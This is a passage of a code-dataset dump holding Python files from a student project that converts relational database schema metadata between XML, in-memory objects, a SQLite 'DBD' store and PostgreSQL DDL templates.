constraint.kind:\n constraint_dom.setAttribute('kind', constraint.kind)\n if len(constraint.details) == 1:\n constraint_dom.setAttribute('items', constraint.details[0].value)\n if constraint.reference:\n constraint_dom.setAttribute('reference', constraint.reference)\n if constraint.constraint:\n constraint_dom.setAttribute('constraint', constraint.constraint)\n if constraint.expression:\n constraint_dom.setAttribute('expression', constraint.expression)\n\n props = []\n if constraint.has_value_edit:\n props.append('has_value_edit')\n if constraint.cascading_delete == False:\n props.append('cascading_delete')\n if constraint.cascading_delete == True:\n props.append('full_cascading_delete')\n if len(props) > 0:\n constraint_dom.setAttribute('props', ', '.join(props))\n return constraint_dom\n\n\ndef _create_index_dom(index: Index, doc: Document):\n \"\"\" Создать DOM-элемент Индекса, определить все его атрибуты.\n\n :param index: Объект RAM-представления Индекса.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Индекса.\n \"\"\"\n index_dom = doc.createElement('index')\n if index.name:\n index_dom.setAttribute('name', index.name)\n if len(index.details) == 1:\n index_dom.setAttribute('field', index.details[0].value)\n\n props = []\n if index.local:\n props.append('local')\n if index.kind == 'uniqueness':\n props.append('uniqueness')\n if index.kind == 'fulltext':\n props.append('fulltext')\n if len(props) > 0:\n index_dom.setAttribute('props', ', '.join(props))\n return index_dom\n\n\ndef _create_constraint_detail_dom(detail: ConstraintDetail, doc: Document):\n \"\"\" Создать DOM-элемент Детали ограничения, определить все его атрибуты.\n\n :param detail: Объект RAM-представления Детали ограничения.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Детали ограничения.\n \"\"\"\n detail_dom = doc.createElement('item')\n if detail.value:\n detail_dom.setAttribute('value', detail.value)\n return detail_dom\n\n\ndef _create_index_detail_dom(detail: IndexDetail, doc: Document):\n \"\"\" Создать DOM-элемент Детали индекса, определить все его атрибуты.\n\n :param detail: Объект RAM-представления Детали индекса.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Детали индекса.\n \"\"\"\n detail_dom = doc.createElement('item')\n if detail.value:\n detail_dom.setAttribute('value', detail.value)\n if detail.expression:\n detail_dom.setAttribute('expression', detail.expression)\n if detail.descend:\n detail_dom.setAttribute('descend', detail.descend)\n return detail_dom\n"
},
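Every _create_*_dom helper in ram_to_xml.py above follows the same recipe: collect boolean flags into a list and serialize the truthy ones as one comma-joined 'props' attribute. A self-contained sketch of that recipe, using the standard library's minidom in place of the repo's minidom_fixed (the helper name and sample flags are illustrative):

from xml.dom.minidom import Document

def element_with_props(doc, tag, flags):
    # Only truthy flags are emitted, comma-joined, like the props lists above.
    el = doc.createElement(tag)
    props = [name for name, on in flags.items() if on]
    if props:
        el.setAttribute('props', ', '.join(props))
    return el

doc = Document()
el = element_with_props(doc, 'table', {'add': True, 'edit': False, 'delete': True})
print(el.toxml())  # <table props="add, delete"/>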
{
"alpha_fraction": 0.4672224223613739,
"alphanum_fraction": 0.47182393074035645,
"avg_line_length": 46.75796127319336,
"blob_id": "3df1740fdefb6675f1a3ec386b1207956ff2f50a",
"content_id": "7899955671f6b51013bc34f87cfa0d8023aa94d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14995,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 314,
"path": "/dbd_repr/dbd_structure.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nCURRENT_DBD_VERSION = '3.1'\n\nSQL_DBD_PRE_INIT = \"\"\"\n CREATE TABLE dbd$schemas (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL\n ,name VARCHAR NOT NULL\n ,fulltext_engine VARCHAR NULL\n ,version VARCHAR NULL\n ,description VARCHAR NULL\n );\n\"\"\"\n\nSQL_DBD_DOMAINS_TABLE_INIT = \"\"\"\n CREATE TABLE dbd$domains (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,name VARCHAR UNIQUE DEFAULT(NULL) NULL \n ,description VARCHAR DEFAULT(NULL) NULL \n ,data_type_id INTEGER NOT NULL \n ,length INTEGER DEFAULT(NULL) NULL \n ,char_length INTEGER DEFAULT(NULL) NULL \n ,precision INTEGER DEFAULT(NULL) NULL \n ,scale INTEGER DEFAULT(NULL) NULL \n ,width INTEGER DEFAULT(NULL) NULL \n ,align CHAR DEFAULT(NULL) NULL \n ,show_null BOOLEAN DEFAULT(NULL) NULL \n ,show_lead_nulls BOOLEAN DEFAULT(NULL) NULL \n ,thousands_separator BOOLEAN DEFAULT(NULL) NULL \n ,summable BOOLEAN DEFAULT(NULL) NULL \n ,case_sensitive BOOLEAN DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL COLLATE NOCASE\n );\n \n CREATE INDEX \"idx.FZX832TFV\" ON dbd$domains(data_type_id);\n CREATE INDEX \"idx.4AF9IY0XR\" ON dbd$domains(uuid);\n\"\"\"\n\nSQL_DBD_TABLES_TABLE_INIT = \"\"\"\n CREATE TABLE dbd$tables (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,schema_id INTEGER DEFAULT(NULL) NULL \n ,name VARCHAR UNIQUE NULL \n ,description VARCHAR DEFAULT(NULL) NULL \n ,can_add BOOLEAN DEFAULT(NULL) NULL \n ,can_edit BOOLEAN DEFAULT(NULL) NULL \n ,can_delete BOOLEAN DEFAULT(NULL) NULL \n ,temporal_mode VARCHAR DEFAULT(NULL) NULL \n ,means VARCHAR DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL COLLATE NOCASE \n ); \n \n CREATE INDEX \"idx.GCOFIBEBJ\" ON dbd$tables(name);\n CREATE INDEX \"idx.2J02T9LQ7\" ON dbd$tables(uuid);\n\"\"\"\n\nSQL_DBD_TABLES_INIT = \"\"\"\n CREATE TABLE dbd$fields (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,table_id INTEGER NOT NULL \n ,position INTEGER NOT NULL \n ,name VARCHAR NOT NULL \n ,russian_short_name VARCHAR NOT NULL \n ,description VARCHAR DEFAULT(NULL) NULL \n ,domain_id INTEGER NOT NULL \n ,can_input BOOLEAN DEFAULT(NULL) NULL \n ,can_edit BOOLEAN DEFAULT(NULL) NULL \n ,show_in_grid BOOLEAN DEFAULT(NULL) NULL \n ,show_in_details BOOLEAN DEFAULT(NULL) NULL\n ,is_mean BOOLEAN DEFAULT(NULL) NULL \n ,autocalculated BOOLEAN DEFAULT(NULL) NULL \n ,required BOOLEAN DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL COLLATE NOCASE\n );\n \n CREATE INDEX \"idx.7UAKR6FT7\" ON dbd$fields(table_id);\n CREATE INDEX \"idx.7HJ6KZXJF\" ON dbd$fields(position);\n CREATE INDEX \"idx.74RSETF9N\" ON dbd$fields(name);\n CREATE INDEX \"idx.6S0E8MWZV\" ON dbd$fields(domain_id);\n CREATE INDEX \"idx.88KWRBHA7\" ON dbd$fields(uuid);\n \n \n CREATE TABLE dbd$constraints (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,table_id INTEGER NOT NULL \n ,name VARCHAR DEFAULT(NULL) NULL \n ,constraint_type CHAR DEFAULT(NULL) NULL \n ,reference INTEGER DEFAULT(NULL) NULL \n ,unique_key_id INTEGER DEFAULT(NULL) NULL \n ,has_value_edit BOOLEAN DEFAULT(NULL) NULL \n ,cascading_delete BOOLEAN DEFAULT(NULL) NULL \n ,expression VARCHAR DEFAULT(NULL) NULL\n ,uuid VARCHAR UNIQUE NOT NULL COLLATE NOCASE \n );\n \n CREATE INDEX \"idx.6F902GEQ3\" ON dbd$constraints(table_id);\n CREATE INDEX \"idx.6SRYJ35AJ\" ON dbd$constraints(name);\n CREATE INDEX \"idx.62HLW9WGB\" ON dbd$constraints(constraint_type);\n CREATE INDEX \"idx.5PQ7Q3E6J\" ON dbd$constraints(reference);\n CREATE INDEX \"idx.92GH38TZ4\" 
ON dbd$constraints(unique_key_id);\n CREATE INDEX \"idx.6IOUMJINZ\" ON dbd$constraints(uuid);\n\n\n CREATE TABLE dbd$constraint_details (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,constraint_id INTEGER NOT NULL \n ,position INTEGER NOT NULL \n ,field_id INTEGER NOT NULL \n );\n \n CREATE INDEX \"idx.5CYTJWVWR\" ON dbd$constraint_details(constraint_id);\n CREATE INDEX \"idx.507FDQDMZ\" ON dbd$constraint_details(position);\n CREATE INDEX \"idx.4NG17JVD7\" ON dbd$constraint_details(field_id);\n\n\n CREATE TABLE dbd$indices (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,table_id INTEGER NOT NULL NULL \n ,name VARCHAR DEFAULT(NULL) NULL \n ,local BOOLEAN DEFAULT(0) NULL \n ,kind CHAR DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL COLLATE NOCASE \n );\n \n CREATE INDEX \"idx.12XXTJUYZ\" ON dbd$indices(table_id);\n CREATE INDEX \"idx.6G0KCWN0R\" ON dbd$indices(name);\n CREATE INDEX \"idx.FQH338PQ7\" ON dbd$indices(uuid);\n\n\n CREATE TABLE dbd$index_details (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,index_id INTEGER NOT NULL\n ,position INTEGER NOT NULL\n ,field_id INTEGER DEFAULT(NULL) NULL\n ,expression VARCHAR DEFAULT(NULL) NULL\n ,descend BOOLEAN DEFAULT(NULL) NULL \n );\n \n CREATE INDEX \"idx.H1KFOWTCB\" ON dbd$index_details(index_id);\n CREATE INDEX \"idx.BQA4HXWNF\" ON dbd$index_details(field_id);\n \n\n CREATE TABLE dbd$data_types (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL\n ,type_id VARCHAR UNIQUE NOT NULL\n );\n\n INSERT INTO dbd$data_types(type_id) VALUES ('STRING');\n INSERT INTO dbd$data_types(type_id) VALUES ('SMALLINT');\n INSERT INTO dbd$data_types(type_id) VALUES ('INTEGER');\n INSERT INTO dbd$data_types(type_id) VALUES ('WORD');\n INSERT INTO dbd$data_types(type_id) VALUES ('BOOLEAN');\n INSERT INTO dbd$data_types(type_id) VALUES ('FLOAT');\n INSERT INTO dbd$data_types(type_id) VALUES ('CURRENCY');\n INSERT INTO dbd$data_types(type_id) VALUES ('BCD');\n INSERT INTO dbd$data_types(type_id) VALUES ('FMTBCD');\n INSERT INTO dbd$data_types(type_id) VALUES ('DATE');\n INSERT INTO dbd$data_types(type_id) VALUES ('TIME');\n INSERT INTO dbd$data_types(type_id) VALUES ('DATETIME');\n INSERT INTO dbd$data_types(type_id) VALUES ('TIMESTAMP');\n INSERT INTO dbd$data_types(type_id) VALUES ('BYTES');\n INSERT INTO dbd$data_types(type_id) VALUES ('VARBYTES');\n INSERT INTO dbd$data_types(type_id) VALUES ('BLOB');\n INSERT INTO dbd$data_types(type_id) VALUES ('MEMO');\n INSERT INTO dbd$data_types(type_id) VALUES ('GRAPHIC');\n INSERT INTO dbd$data_types(type_id) VALUES ('FMTMEMO');\n INSERT INTO dbd$data_types(type_id) VALUES ('FIXEDCHAR');\n INSERT INTO dbd$data_types(type_id) VALUES ('WIDESTRING');\n INSERT INTO dbd$data_types(type_id) VALUES ('LARGEINT');\n INSERT INTO dbd$data_types(type_id) VALUES ('COMP');\n INSERT INTO dbd$data_types(type_id) VALUES ('ARRAY');\n INSERT INTO dbd$data_types(type_id) VALUES ('FIXEDWIDECHAR');\n INSERT INTO dbd$data_types(type_id) VALUES ('WIDEMEMO');\n INSERT INTO dbd$data_types(type_id) VALUES ('CODE');\n INSERT INTO dbd$data_types(type_id) VALUES ('RECORDID');\n INSERT INTO dbd$data_types(type_id) VALUES ('SET');\n INSERT INTO dbd$data_types(type_id) VALUES ('PERIOD');\n INSERT INTO dbd$data_types(type_id) VALUES ('BYTE');\n\"\"\" % {'dbd_version': CURRENT_DBD_VERSION}\n\nSQL_DBD_VIEWS_INIT = \"\"\"\n CREATE VIEW dbd$view_fields \n AS\n SELECT\n sch.name AS \"schema\"\n ,tab.name AS \"table\"\n ,fld.position AS \"position\"\n ,fld.name AS \"name\"\n ,fld.russian_short_name AS 
\"russian_short_name\"\n ,fld.description AS \"description\"\n ,type.type_id AS \"type_id\"\n ,dom.length AS \"length\"\n ,dom.char_length AS \"char_length\"\n ,dom.width AS \"width\"\n ,dom.align AS \"align\"\n ,dom.precision AS \"precision\"\n ,dom.scale AS \"scale\"\n ,dom.show_null AS \"show_null\"\n ,dom.show_lead_nulls AS \"show_lead_nulls\"\n ,dom.thousands_separator AS \"thousands_separator\"\n ,dom.summable AS \"summable\"\n ,dom.case_sensitive AS \"case_sensitive\"\n ,fld.can_input AS \"can_input\"\n ,fld.can_edit AS \"can_edit\"\n ,fld.show_in_grid AS \"show_in_grid\"\n ,fld.show_in_details AS \"show_in_details\"\n ,fld.is_mean AS \"is_mean\"\n ,fld.autocalculated AS \"autocalculated\"\n ,fld.required AS \"required\"\n FROM dbd$fields AS fld\n INNER JOIN dbd$tables AS tab\n ON fld.table_id = tab.id\n INNER JOIN dbd$domains AS dom\n ON fld.domain_id = dom.id\n INNER JOIN dbd$data_types AS type\n ON dom.data_type_id = type.id\n LEFT JOIN dbd$schemas AS sch\n ON tab.schema_id = sch.id\n ORDER BY\n bd$tables.name\n ,bd$fields.position;\n \n \n CREATE VIEW dbd$view_domains \n AS\n SELECT\n dom.id\n ,dom.name\n ,dom.description\n ,type.type_id\n ,dom.length\n ,dom.char_length\n ,dom.width\n ,dom.align\n ,dom.summable\n ,dom.precision\n ,dom.scale\n ,dom.show_null\n ,dom.show_lead_nulls\n ,dom.thousands_separator\n ,dom.case_sensitive \"case_sensitive\"\n FROM dbd$domains AS dom\n INNER JOIN dbd$data_types AS type\n ON dom.data_type_id = type.id\n ORDER BY dom.id;\n \n \n CREATE VIEW dbd$view_constraints \n AS\n SELECT\n con.id AS \"constraint_id\"\n ,con.constraint_type AS \"constraint_type\"\n ,det.position AS \"position\"\n ,sch.name AS \"schema\"\n ,tab.name AS \"table_name\"\n ,fld.name AS \"field_name\"\n ,ref.name AS \"reference\"\n FROM dbd$constraint_details AS det\n INNER JOIN dbd$constraints AS con\n ON det.constraint_id = con.id\n INNER JOIN dbd$tables AS tab\n ON con.table_id = tab.id\n LEFT JOIN dbd$tables AS ref\n ON con.reference = ref.id\n LEFT JOIN dbd$fields AS fld\n ON det.field_id = fld.id\n LEFT JOIN dbd$schemas AS sch\n ON tab.schema_id = sch.id\n ORDER BY\n constraint_id\n ,position;\n \n \n CREATE VIEW dbd$view_indices \n AS\n SELECT\n ind.id AS \"index_id\"\n ,ind.name AS \"index_name\"\n ,sch.name AS \"schema\"\n ,tab.name AS \"table_name\"\n ,ing.local\n ,ing.kind\n ,det.position\n ,fld.name AS \"field_name\"\n ,det.expression\n ,det.descend\n FROM dbd$index_details AS det\n INNER JOIN dbd$indices AS ind\n ON det.index_id = ind.id\n INNER JOIN dbd$tables AS tab\n ON ind.table_id = tab.id\n LEFT JOIN dbd$fields AS fld\n ON det.field_id = fld.id\n LEFT JOIN dbd$schemas AS sch\n ON tab.schema_id = sch.id\n ORDER BY\n dbd$tables.name\n ,dbd$indices.name\n ,dbd$index_details.position;\n\"\"\"\n\nBEGIN_TRANSACTION = \"\"\"\n PRAGMA FOREIGN_KEYS = ON;\n BEGIN TRANSACTION;\n\"\"\"\n\nCOMMIT = \"\"\"\nCOMMIT;\n\"\"\"\n\nSQL_DBD_Init = BEGIN_TRANSACTION + SQL_DBD_PRE_INIT + SQL_DBD_DOMAINS_TABLE_INIT + \\\n SQL_DBD_TABLES_TABLE_INIT + SQL_DBD_TABLES_INIT + SQL_DBD_VIEWS_INIT + COMMIT"
},
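The file above only defines DDL strings; a minimal sketch of how they are meant to be consumed (assuming the module is importable as `dbd_repr.dbd_structure`, as the other files in this repository import it) is to run the combined batch through `sqlite3`:

```python
# Minimal sketch: build the DBD metadata schema in an in-memory SQLite
# database and list the dbd$ tables it creates. Only the import path is
# taken from this repository; everything else is standard library.
import sqlite3

from dbd_repr.dbd_structure import SQL_DBD_Init

conn = sqlite3.connect(':memory:')
conn.executescript(SQL_DBD_Init)  # runs the whole multi-statement DDL batch

rows = conn.execute(
    "SELECT name FROM sqlite_master WHERE type = 'table' AND name LIKE 'dbd$%'"
).fetchall()
print(sorted(row[0] for row in rows))  # dbd$constraints, dbd$domains, ...
conn.close()
```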
{
"alpha_fraction": 0.487964391708374,
"alphanum_fraction": 0.4886910617351532,
"avg_line_length": 41.01526641845703,
"blob_id": "85d7e58a08aaa6928ac434a48f3222ae7373eaf9",
"content_id": "12a453ccf84dc8192d27088f6814c1acd6380c7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12119,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 262,
"path": "/ram_repr/ram_to_dbd.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import configparser\nimport errno\nimport os\nimport sqlite3\nimport uuid\n\nfrom dbd_repr.dbd_structure import BEGIN_TRANSACTION\nfrom dbd_repr.dbd_structure import COMMIT\nfrom dbd_repr.dbd_structure import SQL_DBD_Init\nfrom dbd_repr.dbd_temp_structure import SQL_TMP_INIT\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import ConstraintDetail\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import IndexDetail\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\n\n\nclass DbdUploadConnection:\n \"\"\" Класс, реализующий подключение к базе SQLite лдя создания DBD-представления схемы БД.\n \"\"\"\n def __init__(self, config_file: str, db_file: str):\n self.config = configparser.ConfigParser()\n self.config.read(config_file, 'utf-8')\n self._drop_if_exists(db_file)\n self.conn = sqlite3.connect(db_file)\n self.cursor = self.conn.cursor()\n\n def __exit__(self):\n self.conn.close()\n\n @staticmethod\n def _drop_if_exists(file_name: str):\n \"\"\" Удалить файл, если он существует.\n\n :param file_name: Путь к удаляемому файлу.\n :return: None\n \"\"\"\n try:\n os.remove(file_name)\n except OSError as e:\n if e.errno != errno.ENOENT:\n raise\n\n def create_dbd_repr(self):\n \"\"\" Создать основные источники для струтктурных элементов.\n\n :return: None\n \"\"\"\n self.cursor.executescript(SQL_DBD_Init)\n\n def create_tmp_dbd_repr(self):\n \"\"\" Создать временные источники для структурных элементов.\n\n :return: None\n \"\"\"\n self.cursor.executescript(SQL_TMP_INIT)\n\n def fill_main_tables(self):\n \"\"\" Запустить скрипт переливки данных из временных источников в основные.\n\n :return: None\n \"\"\"\n self.cursor.executescript(self.config.get('PROCESSING', 'fill_main_tables'))\n\n def upload_schema(self, schema: Schema):\n \"\"\" Выгрузить данные из объекта схемы во временных источник схем.\n\n :param schema: объект схемы\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'schema')\n self.cursor.execute(query, {\n 'name': schema.name,\n 'fulltext_engine': schema.fulltext_engine,\n 'version': schema.version,\n 'description': schema.description\n }\n )\n\n def upload_domain(self, domain: Domain):\n \"\"\" Выгрузить данные из объекта домена во временный источник доменов.\n\n :param domain: объект домена\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'domain')\n self.cursor.execute(query, {\n 'name': domain.name,\n 'description': domain.description,\n 'data_type_name': domain.type,\n 'length': domain.length,\n 'char_length': domain.char_length,\n 'precision': domain.precision,\n 'scale': domain.scale,\n 'width': domain.width,\n 'align': domain.align,\n 'show_null': domain.show_null,\n 'show_lead_nulls': domain.show_lead_nulls,\n 'thousands_separator': domain.thousands_separator,\n 'summable': domain.summable,\n 'case_sensitive': domain.case_sensitive,\n 'uuid': uuid.uuid1().hex\n }\n )\n\n def upload_table(self, table: Table, schema: Schema):\n \"\"\" Выгрузить данные из объекта таблицы во временный источник таблиц.\n\n :param table: объект таблицы\n :param schema: объект схемы\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'table')\n self.cursor.execute(query, {\n 'schema_name': schema.name,\n 'name': table.name,\n 'description': table.description,\n 'can_add': table.add,\n 'can_edit': table.edit,\n 'can_delete': table.delete,\n 'temporal_mode': table.temporal_mode,\n 
'means': table.means,\n 'uuid': uuid.uuid1().hex\n }\n )\n\n def upload_field(self, field: Field, table: Table):\n \"\"\" Выгрузить данные из объекта поля во временный источник полей.\n\n :param field: объект поля\n :param table: объект таблицы\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'field')\n self.cursor.execute(query, {\n 'table_name': table.name,\n 'position': list(table.fields.values()).index(field),\n 'name': field.name,\n 'russian_short_name': field.rname,\n 'description': field.description,\n 'domain_name': field.domain,\n 'can_input': field.input,\n 'can_edit': field.edit,\n 'show_in_grid': field.show_in_grid,\n 'show_in_details': field.show_in_details,\n 'is_mean': field.is_mean,\n 'autocalculated': field.autocalculated,\n 'required': field.required,\n 'uuid': uuid.uuid1().hex\n }\n )\n\n def upload_constraint(self, constraint: Constraint, table: Table):\n \"\"\" Выгрузить данные из объекта ограничения во временный источника ограничений.\n\n :param constraint: объект ограничения\n :param table: объект таблицы\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'constraint')\n self.cursor.execute(query, {\n 'id': id(constraint),\n 'table_name': table.name,\n 'name': constraint.name,\n 'constraint_type': constraint.kind,\n 'reference': constraint.reference,\n 'unique_key_name': constraint.constraint,\n 'has_value_edit': constraint.has_value_edit,\n 'cascading_delete': constraint.cascading_delete,\n 'expression': constraint.expression,\n 'uuid': uuid.uuid1().hex\n }\n )\n\n def upload_index(self, index: Index, table: Table):\n \"\"\" Выгрузить данные из объекта индекса во временный источник индексов.\n\n :param index: объект индекса\n :param table: объект таблицы\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'index')\n self.cursor.execute(query, {\n 'id': id(index),\n 'table_name': table.name,\n 'name': index.name,\n 'local': index.local,\n 'kind': index.kind,\n 'uuid': uuid.uuid1().hex\n }\n )\n\n def upload_constraint_detail(self, detail: ConstraintDetail, constraint: Constraint):\n \"\"\" Выгрузить данные из объекта детали ограничения во временный источник деталей ограничений.\n\n :param detail: объект детали ограничения.\n :param constraint: объект ограничения.\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'constraint_detail')\n self.cursor.execute(query, {\n 'constraint_id': id(constraint),\n 'position': constraint.details.index(detail),\n 'field_name': detail.value\n }\n )\n\n def upload_index_detail(self, detail: IndexDetail, index: Index):\n \"\"\" Выгрузить данные из объекта детали индекса во временный источник деталей индексов.\n\n :param detail: объект детали индекса\n :param index: объект индекса\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'index_detail')\n self.cursor.execute(query, {\n 'index_id': id(index),\n 'position': index.details.index(detail),\n 'field_name': detail.value,\n 'expression': detail.expression,\n 'descend': detail.descend\n }\n )\n\n\ndef upload(schemas: list, db_file: str):\n \"\"\" Произвести выгрузку RAM-представления, передаваемого в виде списка схем, в базу SQLite по указанному пути,\n сформировав тем самым DBD-представление схемы БД.\n\n :param schemas: список объектов схем\n :param db_file: путь к файлу базы данных\n :return: None\n \"\"\"\n conn = DbdUploadConnection('dbd_queries_sqlite.cfg', db_file)\n conn.create_dbd_repr()\n conn.create_tmp_dbd_repr()\n\n conn.cursor.executescript(BEGIN_TRANSACTION)\n\n for schema in schemas:\n 
conn.upload_schema(schema)\n for domain in schema.domains.values():\n conn.upload_domain(domain)\n for table in schema.tables.values():\n conn.upload_table(table, schema)\n for field in table.fields.values():\n conn.upload_field(field, table)\n for constraint in table.constraints:\n conn.upload_constraint(constraint, table)\n for detail in constraint.details:\n conn.upload_constraint_detail(detail, constraint)\n for index in table.indexes:\n conn.upload_index(index, table)\n for detail in index.details:\n conn.upload_index_detail(detail, index)\n\n conn.cursor.execute(COMMIT)\n\n conn.fill_main_tables()\n\n"
},
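A hypothetical end-to-end invocation, mirroring how the test modules in this repository chain the converters (both file paths are placeholders):

```python
# Parse an XML schema representation into RAM objects, then serialize
# them into a SQLite DBD file via the upload() entry point defined above.
from ram_repr.ram_to_dbd import upload
from xml_repr.xml_to_ram import read

schemas = read('tasks.xml')     # placeholder path to an XML representation
upload(schemas, 'dbd_repr.db')  # creates the SQLite file and fills it
```

Note that `upload` opens `dbd_queries_sqlite.cfg` with a relative path, so the working directory must contain that config when the sketch runs.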
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 63.79999923706055,
"blob_id": "b9dc1d73cbb1468814f22c8d663017ec3f8bf305",
"content_id": "5e8eda559093f2f0830c68db8e27dd59c540ccfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 372,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 5,
"path": "/_test/test_ddl_applying.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "from db_deploy.ddl_applying import DbCreationConnection\n\ndb = DbCreationConnection('../database.cfg', '../dbd_queries_sqlite.cfg')\ndb.deploy(db_name='Collective', repr_file=r'C:\\Studying\\Коллективная разработка ПО\\dbd_repr.db')\ndb.deploy(db_name='development',repr_file=r'C:\\Studying\\Коллективная разработка ПО\\prjadm.xml')\n"
},
{
"alpha_fraction": 0.5187810063362122,
"alphanum_fraction": 0.5196314454078674,
"avg_line_length": 36.328041076660156,
"blob_id": "737d1a457a5cad90881f092ed31e4fb20a9f7f6a",
"content_id": "c3f892919424b55231916e422542a9a4ecb9eaa8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7687,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 189,
"path": "/db_deploy/ddl_generator.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "\"\"\" Модуль, содержащий методы генерации DDL-инструкций для PostgreSQL\nиз RAM-представления схемы БД, основываясь на шаблонах из файла.\n\"\"\"\nimport configparser\nimport string\n\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\n\n\nclass DdlGenerator:\n \"\"\" Класс-генератор DDL-инструкций для создания элеменов БД, исходя из представления\n метаданных в ОП.\n \"\"\"\n def __init__(self):\n self.config = configparser.ConfigParser()\n self.config_file = open('../ddl_templates.cfg', encoding='utf-8')\n self.config.read_file(self.config_file)\n self.templates = self.config['TEMPLATES']\n\n def __exit__(self):\n self.config_file.close()\n\n def create_schema_dll(self, schema: Schema):\n \"\"\" Создать DDL-инструкцию создания схемы в базу PostgreSQL.\n\n :param schema: объект схемы.\n :return: str\n \"\"\"\n return string.Template(self.templates.get('schema'))\\\n .substitute(\n schema_name=schema.name\n )\n\n def create_domain_dll(self, domain: Domain, schema: Schema):\n \"\"\" Создать DDL-инструкцию создания схемы в базе PostgreSQL.\n\n :param domain: объект домена\n :param schema: объект схемы\n :return: str\n \"\"\"\n return string.Template(self.templates.get('domain'))\\\n .substitute(\n schema_name=schema.name,\n domain_name=domain.name,\n data_type=self._get_postgres_type(domain),\n description=domain.description\n )\n\n def create_table_ddl(self, table: Table, schema: Schema):\n \"\"\" Создать DDL-инструкцию создания таблицы в базе данных PostgreSQL.\n\n :param table: объект таблицы.\n :param schema: объект схемы.\n :return: str\n \"\"\"\n fields = '\\n,'.join(\n [\n self.create_field_ddl(field, schema)\n for field in table.fields.values()\n ]\n )\n return string.Template(self.templates.get('table'))\\\n .substitute(\n schema_name=schema.name,\n table_name=table.name,\n fields=fields\n )\n\n def create_field_ddl(self, field: Field, schema: Schema):\n \"\"\" Создать DDL-инструкцию дял создания поля в БД.\n\n :param field: объект поля.\n :param schema: объект схемы.\n :return: str\n \"\"\"\n return string.Template(self.templates.get('field'))\\\n .substitute(\n field_name=field.name,\n field_type=field.domain,\n schema_name=schema.name\n )\n\n def create_constraint_ddl(self, constraint: Constraint, table: Table, schema: Schema):\n \"\"\" Создать DDL-инструкцию для создания ограничения в БД.\n\n :param constraint: объект ограничения.\n :param table: объект таблицы.\n :param schema: объект схемы.\n :return: str\n \"\"\"\n details = []\n for det in constraint.details:\n detail = r'\"' + det.value + r'\"'\n details.append(detail)\n\n if constraint.kind.upper() == 'PRIMARY':\n definition = string.Template(self.templates.get('primary'))\\\n .substitute(\n values=', '.join(details)\n )\n\n elif constraint.kind.upper() == 'FOREIGN':\n definition = string.Template(self.templates.get('foreign'))\\\n .substitute(\n values=', '.join(details),\n reference_schema=schema.name,\n reference_table=constraint.reference,\n constraint_name=constraint.name if constraint.name else ''\n )\n else:\n return ''\n\n return string.Template(self.templates.get('constraint'))\\\n .substitute(\n schema_name=schema.name,\n table_name=table.name,\n constraint_definition=definition\n )\n\n def create_index_ddl(self, index: Index, table: Table, schema: Schema):\n \"\"\" Создать DDL-инструкцию для 
